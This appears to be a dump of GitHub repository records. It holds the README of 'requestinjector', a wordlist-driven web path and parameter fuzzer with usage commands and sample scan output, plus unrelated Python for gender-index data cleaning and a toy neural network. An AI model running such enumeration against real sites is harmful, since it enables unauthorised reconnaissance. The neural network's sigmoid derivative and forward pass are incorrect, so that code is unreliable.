arg \\\n\t\t-T trident \\\n\t\t-K key1,key2,key3,key4 \\\n\t\t-w /path/to/wordlist1.txt,/path/to/wordlist2.txt,/path/to/wordlist3.txt,/path/to/wordlist4.txt \\\n\t\t-S statickey1=staticval1,statickey2=staticval2 \\\n\t\t-t 10 \\\n\t\t-r 2 \\\n\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n\t\t--color\n\narg mode (-M arg) using trident attacktype (-T trident), optional static arguments (-S), and --longest and --fillvalue VALUE (itertools.zip_longest())\n\t# NOTE - trident is similar to Burp Suite's pitchfork mode; for each key specified, provided a wordlist (-w WORDLIST1,WORDLIST2,etc); specify the same wordlist multiple times if using this attacktype and you want the same wordlist in multiple positions\n\t# NOTE - --longest and --fillvalue VALUE will run through to the end of the longest provided wordlist, filling empty values with the provided fillvalue\n\t# NOTE - mutations (-m) not yet available for arg mode\n\t\trequestinjector -u \"http://example.com/somepath/a/b/c\" \\\n\t\t-M arg \\\n\t\t-T trident \\\n\t\t-K key1,key2,key3,key4 \\\n\t\t-w /path/to/wordlist1.txt,/path/to/wordlist2.txt,/path/to/wordlist3.txt,/path/to/wordlist4.txt \\\n\t\t-S statickey1=staticval1,statickey2=staticval2 \\\n\t\t--longest \\\n\t\t--fillvalue \"AAAA\" \\\n\t\t-t 10 \\\n\t\t-r 2 \\\n\t\t-p '{\"http\": \"http://127.0.0.1:8080\", \"https\": \"https://127.0.0.1:8080\"}' \\\n\t\t-H '{\"Content-Type\": \"text/plain\"}' \\\n\t\t--color\n\noutput modes: full (default), --simple_output (just status code and full url), --color (same as simple_output but the status code is colorized)\n\nadditional options:\n\t-d/--delay [FLOAT] = add a delay, per thread, as a float (default 0.0)\n\nor import as a module (from requestinjector import RequestInjector)\n```\n\n### Usage (Importable Module)\n```\nfrom requestinjector import RequestInjector\n\nproxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html'}\nurl = \"http://example.com/somepath/a/b/c\"\nwordlist = [\"/path/to/wordlist.txt\"]\n\nx = RequestInjector(url=url, wordlist=wordlist, threads=10, mutate_path=True, headers=headers, proxy=proxy, retries=1, staticargs=\"\", injectkeys=\"\", longest=None, fillvalue=None, simple_output=True)\nx.run()\n```\n\n### Options (-h)\n```\nusage: requestinjector.py [-h] -u URL [-w WORDLIST] [-M MODE] [-H HEADERS]\n [-p PROXY] [-r RETRIES] [-t THREADS] [-d DELAY] [-m]\n [-T ATTACKTYPE] [--longest] [-F FILLVALUE]\n [-S STATICARGS] [-K INJECTKEYS] [--color]\n [--simple_output]\n\nRequestInjector: scan a URL using a given wordlist with optional URL\ntransformations\n\noptional arguments:\n -h, --help show this help message and exit\n\nrequired arguments:\n -u URL, --url URL provide a URL to check\n\ngeneral arguments:\n -w WORDLIST, --wordlist WORDLIST\n provide a wordlist (file) location, or multiple comma-\n separated files in a string, ex. -w\n /home/user/words1.txt or -w\n /home/user/words1.txt,/home/user/words2.txt, etc\n -M MODE, --mode MODE provide a mode (path|arg|body(NYI)) (default path)\n -H HEADERS, --headers HEADERS\n provide a dictionary of headers to include, with\n single-quotes wrapping the dictionary and double-\n quotes wrapping the keys and values, ex. '{\"Content-\n Type\": \"application/json\"}' (defaults to a Firefox\n User-Agent and Accept: text/html) *note default is set\n inside PathWorker class*\n -p PROXY, --proxy PROXY\n provide a dictionary of proxies to use, with single-\n quotes wrapping the dictionary and double-quotes\n wrapping the keys and values, ex. '{\"http\":\n \"http://127.0.0.1:8080\", \"https\":\n \"https://127.0.0.1:8080\"}'\n -r RETRIES, --retries RETRIES\n provide the number of times to retry a connection\n (default 1)\n -t THREADS, --threads THREADS\n provide the number of threads for making requests\n (default 10)\n -d DELAY, --delay DELAY\n provide a delay between requests, per thread, as a\n float (default 0.0); use fewer threads and longer\n delays if the goal is to be less noisy, although the\n amount of requests will remain the same\n -m, --mutate provide if mutations should be applied to the checked\n URL+word (currently only supports path mode, arg mode\n support nyi)\n\narg mode-specific arguments:\n -T ATTACKTYPE, --attacktype ATTACKTYPE\n provide an attack type (shotgun|trident); shotgun is\n similar to Burp Suite's sniper and battering ram\n modes, and trident is similar to pitchfork (default\n shotgun)\n --longest provide if you wish to fully exhaust the longest\n wordlist using the trident attacktype, and not stop\n when the end of shortest wordlist has been reached\n (zip() vis itertools.zip_longest()\n -F FILLVALUE, --fillvalue FILLVALUE\n provide a string to use in null values when using\n --longest with the trident attacktype (such as when\n using two wordlists of differing lengths; the\n fillvalue will be used when the shortest wordlist has\n finished, but terms are still being used from the\n longest wordlist)\n -S STATICARGS, --staticargs STATICARGS\n provide a string of static key=value pairs to include\n in each request, appended to the end of the query, as\n a comma-separated string, ex. key1=val1,key2=val2 etc\n -K INJECTKEYS, --injectkeys INJECTKEYS\n provide a string of keys to be used; using the shotgun\n attacktype, each key will receive values from only the\n first wordlist; using the trident attacktype, each key\n must have a specifc wordlist specified in the matching\n position with the -w WORDLIST option; ex. '-T trident\n -K user,account,sid -w\n userwords.txt,accountids.txt,sids.txt'\n\noutput arguments:\n --color provide if stdout should have colorized status codes\n (will force simple_output format)\n --simple_output provide for simplified output, just status code and\n URL, ex. 200 http://example.com\n```\n\n### Example Output\n```\n# Standard Format\n# Provided URL: http://example.com/somepath/exists\n# Note the IP and port reflect the proxy being used; without a proxy, this will reflect the external address being scanned\nstatus_code:404 bytes:12 word:contactus ip:127.0.0.1 port:8080 url:http://example.com/contactus\nstatus_code:404 bytes:12 word:contactus ip:127.0.0.1 port:8080 url:http://example.com/somepath/contactus\nstatus_code:200 bytes:411 word:contactus ip:127.0.0.1 port:8080 url:http://example.com/somepath/exists/contactus\nstatus_code:404 bytes:12 word:admin ip:127.0.0.1 port:8080 url:http://example.com/admin\nstatus_code:200 bytes:556 word:admin ip:127.0.0.1 port:8080 url:http://example.com/somepath/admin\nstatus_code:200 bytes:556 word:admin ip:127.0.0.1 port:8080 url:http://example.com/somepath/exists/admin\n\n# Simplified Format (simple_output)\n404 http://example.com/contactus\n404 http://example.com/somepath/contactus\n200 http://example.com/somepath/exists/contactus\n404 http://example.com/admin\n200 http://example.com/somepath/admin\n200 http://example.com/somepath/exists/admin\n```\n\n### TODO\n- preview mode\n- body mode, recursive grep, method select/switching\n- logfile dump for every execution\n- redirect history handling\n- body POST/PUT objects using a config\n- optional encodings and obfuscation of words/terms\n- better output handling to support response body content, headers sent/received, etc\n- move more logic out of Worker classes and into pre-processing/Filler and post-processing/Drainer classes\n- jitter, rotating user agents, arg mode mutations (duplicate keys, re-order, null bytes, etc)\n- \"real timeout\" (-R) to use with requests"
}
] | 4 |
dlaumer/mmcarto
|
https://github.com/dlaumer/mmcarto
|
3aa49209da35f4245ec3b02129162d5f850b4c8a
|
2a570270ebcb49d836d780b838a41db0f0fba0cc
|
de4c3c7cfc37f3404abf4c1bec546f3333b92959
|
refs/heads/master
| 2022-06-04T20:34:50.574357 | 2020-05-05T06:56:44 | 2020-05-05T06:56:44 | 261,382,105 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6732206344604492,
"alphanum_fraction": 0.6889500617980957,
"avg_line_length": 40,
"blob_id": "4b598f7b62260643a825458ee5e4ee7baadeca40",
"content_id": "cdef15aec051ca26cc2428145900beebc8d16095",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2543,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 62,
"path": "/preprocessData.py",
"repo_name": "dlaumer/mmcarto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 15 14:58:31 2020\n\n@author: dlaumer\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\t\n#Read file\ndf = pd.read_csv('Gender Inequality Index (GII).csv', delimiter=',')\n# Delete all columns which are empty\ndf = df.dropna(axis='columns',how='all')\n# Delete one specific column called Unnamed: 3\ndf = df.drop(columns = ['Unnamed: 3'])\n# Replace all \"..\" with None\ndf = df.replace(\"..\",np.NaN)\n# Delete the last 19 rows because they contain data we don't need\ndf.drop(df.tail(19).index,inplace=True)\n# Change the data type of the first column to float instead of string\ndf[list(df)[0]] = df[list(df)[0]].astype(float)\n# Change the data type of the other columns to float instead of string\nfor i in range(2,len(list(df))):\n df[list(df)[i]] = df[list(df)[i]].astype(float)\n\n# Change the name of the country to the one of the other file so that the joining works\ndf['Country'][df['Country']=='United States'] = 'United States of America'\ndf['Country'][df['Country']=='Congo (Democratic Republic of the)'] = 'Congo, Democratic Republic of the'\ndf['Country'][df['Country']=='Eswatini (Kingdom of)'] = 'Eswatini'\ndf['Country'][df['Country']=='Hong Kong, China (SAR)'] = 'Hong Kong'\ndf['Country'][df['Country']=='Korea (Republic of)'] ='Korea, Republic of'\ndf['Country'][df['Country']=='Moldova (Republic of)'] = 'Moldova, Republic of'\ndf['Country'][df['Country']=='Tanzania (United Republic of)'] = 'Tanzania, United Republic of'\ndf['Country'][df['Country']=='United Kingdom'] = 'United Kingdom of Great Britain and Northern Ireland'\n\n# Sort the values by country for the join\ndf = df.sort_values(by=['Country'])\n\n# Read in the second file with the 3 letter ids for the countries\ndf1 = pd.read_csv('countryIds.csv',delimiter=',')\n# Only keep the two columns with the country name and the id\ndf1 = df1[['name','alpha-3']]\n# Also sort for the join\ndf1 = df1.sort_values(by=['name'])\n# Join the two datasets\ndf2 = pd.merge(df, df1, left_on='Country',right_on='name')\n\n#Prepare the data for export to tsv\n# Remove some unneeded columns\ndfExport = df2.drop(columns = [\"HDI Rank (2018)\", \"name\"])\n# Replace alll 0 values with None\ndf = df.replace(0,np.NaN)\n# Rename the columns\ndfExport = dfExport.rename({\"alpha-3\":\"id\", \"Country\":\"name\"}, axis='columns')\n# Export to tsv\ndfExport.to_csv(\"GII.tsv\", index = False, sep = '\t')\n\ndfExportT = dfExport.transpose()\ndfExportT = dfExportT.drop(['name'])\ndfExportT = dfExportT.rename(index = {\"id\":\"year\"})\ndfExportT.to_csv(\"GIIGraph.csv\", sep = ',')\n\n"
},
{
"alpha_fraction": 0.7538461685180664,
"alphanum_fraction": 0.8153846263885498,
"avg_line_length": 31.5,
"blob_id": "4f8308c1499c7d16be433b8f076975c0a49fd51b",
"content_id": "0a1ff305bd54d2371e45e7f45d1f40f754d201d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 65,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 2,
"path": "/README.md",
"repo_name": "dlaumer/mmcarto",
"src_encoding": "UTF-8",
"text": "# mmcarto\nProject for Multimedia Cartography at ETH Zurich, 2020\n"
}
] | 2 |
bdatdo0601/projectKitten
|
https://github.com/bdatdo0601/projectKitten
|
395c711974409658e9e2dcd014ac743df6986e3f
|
741d3cc353cedce331d749928be2d36e8d929c7c
|
a3ce20108293ce11b1214716a7f2afd133f86471
|
refs/heads/master
| 2021-01-19T09:12:37.608359 | 2017-04-11T02:10:45 | 2017-04-11T02:10:59 | 87,739,914 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6733435988426208,
"alphanum_fraction": 0.7030045986175537,
"avg_line_length": 34.57534408569336,
"blob_id": "44dbee56e47b83009b3680e562660972d2636ffd",
"content_id": "af0bc5482a944988b834a9eb53dd6c3cac696b28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2596,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 73,
"path": "/createData.py",
"repo_name": "bdatdo0601/projectKitten",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport random as random\n\ntrainingAmount = 5000\t#how many examples it will have to learn\ntestingAmount = 1000\t#how many examples it will guess the output of\n\n\n#2D array to put all the data in\ndata = np.zeros((trainingAmount + testingAmount, 6))\n\n#for all sets of input/output for both training and testing amount\nfor i in range(0, trainingAmount + testingAmount):\n\t#randomly create input for the first 5 inputs for the ith data set\n\tfor j in range(0, 5):\n\t\tdata[i][j] = random.randint(0,9)\t#possible values are 0 to 9\n\t\"\"\"\n\trules for the output after the inputs are randomly chosen:\n\tif the first input is less than 5, output is always 0.\n\tif the previous rule doesn't apply, then if the 2nd input is odd, the output will always be 1\n\tif the rules above don't apply, then if the 3rd or 4th inputs are less than or equal to 4, the output will always be 2\n\tif the rules above don't apply, then if any of the inputs are 0, then the output will always be 3\n\tif none of the above rules apply, the output will always be 4.\n\t\"\"\"\n\tif (data[i][0] < 5):\n\t\tdata[i][5] = 0\n\telif (data[i][1]%2 == 1):\n\t\tdata[i][5] = 1\n\telif (data[i][3] <= 4 or data[i][4] <= 4):\n\t\tdata[i][5] = 2\n\telif (data[i][0]*data[i][1]*data[i][2]*data[i][3]*data[i][4] == 0):\n\t\tdata[i][5] = 3\n\telse:\n\t\tdata[i][5] = 4\n\n#writes data to file 'data.txt'\nthefile = open('data.txt', 'w')\nfor i in range(0, trainingAmount + testingAmount):\n\tfor j in range(0, 5):\n\t\tthefile.write(\"%d,\" % data[i][j])\n\tthefile.write(\"%d\\n\" % data[i][5])\nthefile.close()\n\n#reads data in from file 'data.txt' and organizes it into 4 2D arrays:\ntrainingInput = np.zeros((trainingAmount, 5))\ntrainingOutput = np.zeros((trainingAmount, 1))\ntestingInput = np.zeros((testingAmount, 5))\ntestingOutput = np.zeros((testingAmount, 1))\nfile = open('data.txt', 'r')\n#if the line number is less than 5000, then the input/outputs will be stored int he training arrays\n#otherwise, it'll go into the testing arrays\ni = 0\nfor line in file:\n\t#data is separated by commas, so this line splits the lines up by comma:\n\tcurrentline = line.split(',')\n\t#first 5 digits are inputs, so they go to the input array\n\tfor j in range(0,5):\n\t\tif i < trainingAmount:\n\t\t\ttrainingInput[i][j] = currentline[j]\n\t\telse:\n\t\t\ttestingInput[i-trainingAmount][j] = currentline[j]\n\t#the last number in a line is the output\n\tif i < trainingAmount:\n\t\ttrainingOutput[i][0] = currentline[5]\n\telse:\n\t\ttestingOutput[i-trainingAmount][0] = currentline[5]\n\t#incremment line count before for loop ends\n\ti = i + 1\n\"\"\"\nprint trainingInput\nprint trainingOutput\nprint testingInput\nprint testingOutput\n\"\"\""
},
{
"alpha_fraction": 0.6135996580123901,
"alphanum_fraction": 0.6248990893363953,
"avg_line_length": 38.64799880981445,
"blob_id": "d019cca38113fad10d2cc09aff1c3327f3612c6b",
"content_id": "77e2a0bf96ea46b5c2cc60f309c1d4a2925b6578",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4956,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 125,
"path": "/NeuralNetwork.py",
"repo_name": "bdatdo0601/projectKitten",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\n\"\"\"\nNeural Network:\nthis class will implement a basic neural network system.\n\ninputs to each layer will be represent as a matrix for to simplify calculation.\n\"\"\"\nclass NeuralNetwork(object):\n #initialize ANN by taking an list of size for all the hidden layer in between\n def __init__(self, inputSize=5, outputSize=1, hiddenLayersInfo=[5,4]):\n #amount of inputs\n self.inputSize = inputSize\n #amount of hiddenLayers\n self.hiddenLayers = hiddenLayersInfo\n #amount of outputs\n self.outputSize = outputSize\n #initialize weight\n self.weightAssociated = []\n self.weightAssociated.append(np.random.rand(self.inputSize, self.hiddenLayers[0]))\n for i in range(1, len(self.hiddenLayers)):\n self.weightAssociated.append(np.random.rand(self.hiddenLayers[i-1], self.hiddenLayers[i]))\n self.weightAssociated.append(np.random.rand(self.hiddenLayers[-1], self.outputSize))\n #this is the value at each node as value forward propagate\n self.z = []\n #this will be the the activation funciton value computed from each node\n self.a = []\n\n #activation function, apply it to scalar, vector, matrix, etc\n def sigmoid(self, x):\n return 1/(1+np.exp(-x))\n\n #1st derivative of sigmoid\n def sigmoidP(self, x):\n return np.exp(x)/((1+np.exp(-x))**2)\n\n #propagate data\n def forward(self, inputs):\n #this is the value at each node as value forward propagate\n self.z = []\n #this will be the the activation funciton value computed from each node\n self.a = []\n if len(inputs[0]) != self.inputSize:\n raise(\"input not match\")\n self.z.append(np.dot(inputs, self.weightAssociated[0]))\n self.a.append(self.sigmoid(self.z[0]))\n for i in range(1, len(self.weightAssociated)):\n self.z.append(np.dot(self.a[i-1], self.weightAssociated[i]))\n self.a.append(self.z[-1])\n return self.a[-1]\n\n #compute cost (error estimation)\n def costFunction(self, X, y):\n self.yEst = self.forward(X)\n cost = 0.5*sum((y-self.yEst)**2)\n return cost\n\n #compute deriv of cost respect to each weight for a given training dataset\n #this will return a list of [dJ/dWi] ()\n def costFunctionPrime(self, X, y):\n self.yEst = self.forward(X)\n dJdW = []\n delta = np.multiply(-(y-self.yEst), self.sigmoidP(self.z[-1]))\n dJdW.append(np.dot(self.a[-2].T, delta))\n for i in range(len(self.z)-2, 0, -1):\n delta = np.dot(delta, self.weightAssociated[i+1].T)*self.sigmoidP(self.z[i])\n dJdW.append(np.dot(self.a[i-1].T, delta))\n delta = np.dot(delta, self.weightAssociated[1].T)*self.sigmoidP(self.z[0])\n dJdW.append(np.dot(X.T, delta))\n dJdW = dJdW[::-1]\n return dJdW\n\n \"\"\"\n THIS PART IS FOR CHECKING PURPOSES! REFERENCES SOURCE: https://github.com/stephencwelch/Neural-Networks-Demystified/blob/master/partFive.py\n \"\"\"\n #Helper Functions for interacting with other classes:\n def getParams(self):\n #Get W1 and W2 unrolled into vector:\n params = np.concatenate(tuple(W.ravel() for W in self.weightAssociated))\n return params\n\n def setParams(self, params):\n #Set W1 and W2 using single paramater vector.\n W_start = 0\n W_end = self.hiddenLayers[0] * self.inputSize\n # print(self.weightAssociated)\n self.weightAssociated[0] = np.reshape(params[W_start:W_end], (self.inputSize , self.hiddenLayers[0]))\n for i in range(1, len(self.weightAssociated)-1):\n W_start = W_end\n W_end = W_end + self.hiddenLayers[i]*self.hiddenLayers[i-1]\n self.weightAssociated[i] = np.reshape(params[W_start:W_end], (self.hiddenLayers[i-1], self.hiddenLayers[i]))\n W_start = W_end\n W_end = W_end + self.hiddenLayers[-1]*self.outputSize\n self.weightAssociated[-1] = np.reshape(params[W_start:W_end], (self.hiddenLayers[-1], self.outputSize))\n\n def computeGradients(self, X, y):\n DJDW = self.costFunctionPrime(X, y)\n return np.concatenate(tuple(dJdW.ravel() for dJdW in DJDW))\n\ndef computeNumericalGradient(N, X, y):\n paramsInitial = N.getParams()\n numgrad = np.zeros(paramsInitial.shape)\n perturb = np.zeros(paramsInitial.shape)\n e = 1e-4\n\n for p in range(len(paramsInitial)):\n #Set perturbation vector\n perturb[p] = e\n N.setParams(paramsInitial + perturb)\n loss2 = N.costFunction(X, y)\n\n N.setParams(paramsInitial - perturb)\n loss1 = N.costFunction(X, y)\n\n #Compute Numerical Gradient\n numgrad[p] = (loss2 - loss1) / (2*e)\n\n #Return the value we changed to zero:\n perturb[p] = 0\n\n #Return Params to original value:\n N.setParams(paramsInitial)\n\n return numgrad\n"
},
{
"alpha_fraction": 0.8513513803482056,
"alphanum_fraction": 0.8513513803482056,
"avg_line_length": 36,
"blob_id": "a397ef5013e6242ce5d090fc972693d932220542",
"content_id": "92cceb720d53d4e53a6b1a9e2777294a25b31f52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 2,
"path": "/README.md",
"repo_name": "bdatdo0601/projectKitten",
"src_encoding": "UTF-8",
"text": "# projectKitten\nFirst try for implementation of Artificial Neural Network\n"
},
{
"alpha_fraction": 0.7183527946472168,
"alphanum_fraction": 0.7407219409942627,
"avg_line_length": 31.78333282470703,
"blob_id": "7e61e60f4ff3655cc65b276a04396a6f61218132",
"content_id": "93522047935545d66d9ae5478739cdc0048411c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1967,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 60,
"path": "/test.py",
"repo_name": "bdatdo0601/projectKitten",
"src_encoding": "UTF-8",
"text": "from NeuralNetwork import NeuralNetwork\n# from videoSupport import *\nfrom Trainer import trainer\nfrom NeuralNetwork import computeNumericalGradient\nimport numpy as np\n\nNN = NeuralNetwork()\n#input training dataset\n#reads data in from file 'data.txt' and organizes it into 4 2D arrays:\ntrainingAmount = 5000\t#how many examples it will have to learn\ntestingAmount = 3\t#how many examples it will guess the output of\ninputMax = 9\noutputMax = 4\ntrainingInput = np.zeros((trainingAmount, 5))\ntrainingOutput = np.zeros((trainingAmount, 1))\ntestingInput = np.zeros((testingAmount, 5))\ntestingOutput = np.zeros((testingAmount, 1))\nfile = open('data.txt', 'r')\n#if the line number is less than 5000, then the input/outputs will be stored int he training arrays\n#otherwise, it'll go into the testing arrays\ni = 0\nfor line in file:\n\t#data is separated by commas, so this line splits the lines up by comma:\n\tcurrentline = line.split(',')\n\t#first 5 digits are inputs, so they go to the input array\n\tfor j in range(0,5):\n\t\tif i < trainingAmount:\n\t\t\ttrainingInput[i][j] = currentline[j]\n\t\telif i < (trainingAmount+testingAmount):\n\t\t\ttestingInput[i-trainingAmount][j] = currentline[j]\n\t#the last number in a line is the output\n\tif i < trainingAmount:\n\t\ttrainingOutput[i][0] = currentline[5]\n\telif i < (trainingAmount+testingAmount):\n\t\ttestingOutput[i-trainingAmount][0] = currentline[5]\n\ti = i + 1\n\n\n#normalize dataset\ntrainingInput = trainingInput/inputMax\ntrainingOutput = trainingOutput/outputMax\n\n#Train data\nT = trainer(NN)\nT.train(trainingInput, trainingOutput)\n\n#Testing\nX = np.array(([7,1,6,7,2], [4,9,7,8,6], [9,7,8,2,3]), dtype=float)/inputMax\ny = np.array(([1], [0], [1]), dtype=float)/outputMax\nyEst = NN.forward(X)\nprint(yEst)\nprint(y)\nprint \"relative error: {}\".format(abs(y-yEst)/yEst)\n\n#Error estimation\nnumgrad = computeNumericalGradient(NN, X, y)\ngrad = NN.computeGradients(X, y)\ngradErr = np.linalg.norm(grad-numgrad)/np.linalg.norm(grad+numgrad)\n\n# print (gradErr)\n"
}
] | 4 |
colonyevan/sudoku
|
https://github.com/colonyevan/sudoku
|
2a809c41150ef8ae3c530270b1eb3e6a50131314
|
3fed7042bac5dec1495e68a6b046f5d82618059d
|
106cd98e140af7273f7ebe9cd3e46ab8bbf09853
|
refs/heads/master
| 2020-12-27T08:00:02.097828 | 2020-05-09T19:23:01 | 2020-05-09T19:23:01 | 237,824,834 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5124297142028809,
"alphanum_fraction": 0.5322083234786987,
"avg_line_length": 29.447513580322266,
"blob_id": "302986fc5e79490a26154405a2147f60f387d7ec",
"content_id": "11a22a84d7ff8f32169b4d80f186a94c71235014",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5511,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 181,
"path": "/sudoku.py",
"repo_name": "colonyevan/sudoku",
"src_encoding": "UTF-8",
"text": "\"\"\"A program that solves a puzzle using backtracking\"\"\"\nfrom random import choice\nimport re\nimport os\nimport pygame\nimport sys\nfrom pygame.locals import *\n\n# Setting the game FPS\nFPS = 10\n\n# Global Window Size Vars\nWINDOWMULTIPLIER = 5 \nWINDOWSIZE = 81\nWINDOWWIDTH = WINDOWSIZE * WINDOWMULTIPLIER\nWINDOWHEIGHT = WINDOWSIZE * WINDOWMULTIPLIER\nSQUARESIZE = int((WINDOWSIZE * WINDOWMULTIPLIER) / 3)\nCELLSIZE = int(SQUARESIZE / 3)\n\n# Font Setting\nglobal BASICFONT, BASICFONTSIZE\nBASICFONTSIZE = 15\nBASICFONT = pygame.font.Font('freesansbold.ttf', BASICFONTSIZE)\n\n# Colors\nWHITE = (255, 255, 255)\nLIGHTGRAY = (200, 200, 200)\nBLACK = (0, 0, 0)\n\nexp = re.compile('([0-9]*\\.*)*')\n\npuzzles = [\n '53..7....6..195....98....6.8...6...34..8.3..17...2...6.6....28....419..5....8..79']\n\nclass Solved(Exception):\n pass\n\nclass Puzzle(object):\n grid = [[] for i in range(9)]\n\n def __init__(self) -> None:\n \"\"\"Initalizes the grid to a proper string\"\"\"\n self.readPuzzle()\n\n def readPuzzle(self) -> None:\n \"\"\"Asks user for Sudoku string if none specified\"\"\"\n userInput = input('Generated (G) grid or User (U) specified? ')\n\n data = ''\n\n while userInput not in ['G', 'U']:\n userInput = input('Please enter a valid choice: ')\n\n if userInput == 'G':\n data = self.getRandom()\n\n if len(data) != 81:\n data = input('Please enter a Sudoku puzzle string: ')\n\n while len(data) != 81 or exp.fullmatch(data) is None:\n data = input(\n 'You didn\\'t enter a valid string. please enter 81 integers or deciamls: ')\n\n counter = 0\n\n for num in data:\n self.grid[int(counter / 9)].append(num)\n counter += 1\n\n print('\\n')\n return\n\n def printGrid(self) -> None:\n \"\"\"Prints the sudoku grid\"\"\"\n for row, i in enumerate(self.grid):\n for col, j in enumerate(i):\n print(j, end = \" \")\n if ((col + 1) % 3 == 0 and col != 8):\n print('|', end=\" \")\n print('\\n', end = \"\")\n if (row + 1) % 3 == 0 and row != 8:\n print('------+-------+-------')\n\n def getRandom(self) -> str:\n \"\"\"Gets a random Sudoku string\"\"\"\n return choice(puzzles)\n\n def backtrack(self, row, col) -> None:\n \"\"\"Uses backtracking to figure out the answer to a puzzle\"\"\"\n # If it is already filled, means it was given, skip\n if row == 9 and self.valid():\n print(\"Solved!\")\n self.printGrid()\n raise Solved\n # Else, start the loop here\n elif self.grid[row][col].isdigit():\n if col == 8:\n self.backtrack(row + 1, 0)\n else:\n self.backtrack(row, col + 1)\n else:\n for num in range(1, 10):\n self.grid[row][col] = str(num)\n if self.valid():\n if col == 8:\n self.backtrack(row + 1, 0)\n else:\n self.backtrack(row, col + 1)\n self.grid[row][col] = '.'\n return\n \n def valid(self) -> bool:\n \"\"\"Figures out if the current board is valid\"\"\"\n col_items = [set() for i in range(9)]\n box_items = [set() for i in range(9)]\n\n for row in range(9):\n row_items = set()\n for col in range(9):\n if self.grid[row][col].isdigit():\n item = self.grid[row][col]\n if item in row_items or item in col_items[col]:\n return False\n row_items.add(item)\n col_items[col].add(item)\n\n index = (row // 3) * 3 + col // 3\n if item in box_items[index]:\n return False\n box_items[index].add(item)\n return True\n\ndef drawGrid() -> None:\n # Draw Minor Lines\n for x in range(0, WINDOWWIDTH, CELLSIZE): # draw vertical lines\n pygame.draw.line(DISPLAYSURF, LIGHTGRAY, (x,0),(x,WINDOWHEIGHT))\n for y in range (0, WINDOWHEIGHT, CELLSIZE): # draw horizontal lines\n pygame.draw.line(DISPLAYSURF, LIGHTGRAY, (0,y), (WINDOWWIDTH, y))\n \n # Draw Major Lines\n for x in range(0, WINDOWWIDTH, SQUARESIZE): # draw vertical lines\n pygame.draw.line(DISPLAYSURF, BLACK, (x,0),(x,WINDOWHEIGHT))\n for y in range (0, WINDOWHEIGHT, SQUARESIZE): # draw horizontal lines\n pygame.draw.line(DISPLAYSURF, BLACK, (0,y), (WINDOWWIDTH, y))\n return None\n\ndef runner() -> bool:\n global FPSCLOCK, DISPLAYSURF\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH,WINDOWHEIGHT))\n\n # Mouse variables\n mouseClicked = False\n mousex = 0\n mousey = 0\n\n # Setting up the grid\n pygame.display.set_caption('Sudoku Solver')\n DISPLAYSURF.fill(WHITE)\n drawGrid()\n\n while True: #main game loop\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == MOUSEMOTION:\n mousex, mousey = event.pos\n elif event.type == MOUSEBUTTONUP:\n mousex, mousey = event.pos\n mouseClicked = True\n \n if mouseClicked:\n drawBox(mousex, mousey)\n\n pygame.display.update() \n FPSCLOCK.tick(FPS)\n\nif __name__ == \"__main__\":\n runner()\n"
}
] | 1 |
rhlee/mpwrapper
|
https://github.com/rhlee/mpwrapper
|
8ba634f34d29400d8a7086bc3347bf13bf4d3a5b
|
d1a0232b70fb63246e10659bc9f7e260fd44c6fd
|
795994bf1b8aa2950e6dd028a54c2f3752b7bf6b
|
refs/heads/master
| 2021-01-20T11:26:06.777915 | 2012-10-08T19:28:04 | 2012-10-08T19:28:04 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6189334988594055,
"alphanum_fraction": 0.6351108551025391,
"avg_line_length": 23.014389038085938,
"blob_id": "3a950eee0dcc6fd1cdf781ee4f76e83f242bf95b",
"content_id": "be0fd681c47f95a90de50d1658c1a3dd3b442092",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3338,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 139,
"path": "/mpwrapper",
"repo_name": "rhlee/mpwrapper",
"src_encoding": "UTF-8",
